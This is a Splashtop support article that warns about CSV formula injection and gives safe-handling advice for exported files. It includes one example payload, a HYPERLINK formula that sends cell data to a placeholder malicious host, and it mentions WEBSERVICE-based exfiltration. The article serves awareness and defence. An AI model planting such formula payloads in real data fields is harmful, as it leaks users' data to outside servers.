1. Splashtop On-Prem - Support
  2. Security
  3. General

CSV Export Vulnerability and Safe Handling Guidelines

Avatar
Splashtop

Overview 

This article is intended to raise awareness about a potential security risk when opening CSV exports in third-party software that interprets formulas. The purpose is to guide users on best practices for handling CSV files securely. Splashtop Gateway exports raw CSV files without data processing capabilities, and the risk arises only when opening these files in applications that execute formulas automatically.

A security risk exists where a user could embed a formula inside text fields (such as a group name). If another user exports and opens the CSV in spreadsheet software that processes formulas (e.g., Microsoft Excel), it may execute the formula, potentially misleading the viewer or leaking data.

How an Attack Could Work

  1. A user enters a formula-like string as a group name, such as: 
    =HYPERLINK("http://malicious-site[.]com/collect?data="&A24, "Click here")
  2. Another user exports the CSV, which includes this formula-like string.
  3. When the exported file is opened in software that interprets formulas, it processes the formula instead of displaying the raw text.
  4. If the user clicks the displayed hyperlink, their data (e.g., A24 cell content) could be sent to an external server.

This attack is not limited to group CSV exports and could affect any CSV export containing user-generated content.

Why Splashtop CSV Exports Are Safe

  • CSV is a plain-text format – It does not execute formulas, process data, or trigger actions by itself.
  • Our system exports raw CSV data – No hidden processing, execution, or transformation occurs within the exported file.
  • Security risks only arise when opening CSV files in third-party software that automatically processes formulas instead of displaying raw text.

Thus, the security risk is introduced by the application used to open the CSV, not the CSV file itself. Users should be aware of these risks when opening CSV files in software like Microsoft Excel or Google Sheets.

Other Potential Attacks

  • WEBSERVICE formulas (Windows environment) – Could be used to transmit data silently when a file is opened.
  • Calculation formulas (e.g., =A1+B2) – Could alter displayed values, misleading the viewer.
  • Other embedded formulas – Could trigger unintended behavior when opened in certain spreadsheet programs.

How to Protect Yourself

1. Open CSV Files Safely

  • Use a text editor (e.g., Notepad) or a dedicated CSV viewer instead of Excel.
  • Disable automatic formula execution in spreadsheet applications when opening CSV files.
  • Do not click on unexpected links or unfamiliar data inside a CSV file.

2. Organizational Best Practices

  • Educate employees and users about the risks of malicious CSV content.
  • Monitor and review CSV export logs for suspicious input patterns.
  • Keep security features enabled in Office applications and enforce organization-wide best practices for handling CSV files.

Disclaimer

Splashtop Gateway provides CSV export functionality that generates raw, unprocessed text-based data. CSV is a plain-text file format and does not contain executable code or perform any processing. Any risk arises only when opening CSV files in software that automatically interprets formulas.

  • The security concern is not caused by our product but by how third-party applications handle CSV files.
  • We advise users to open exported CSV files with software that does not execute formulas automatically.
  • Users are responsible for how they handle exported files in their own environments.

By following these precautions, users can minimize the risk of CSV-based attacks and ensure data integrity when handling exports.

0 out of 0 found this helpful

Articles in this section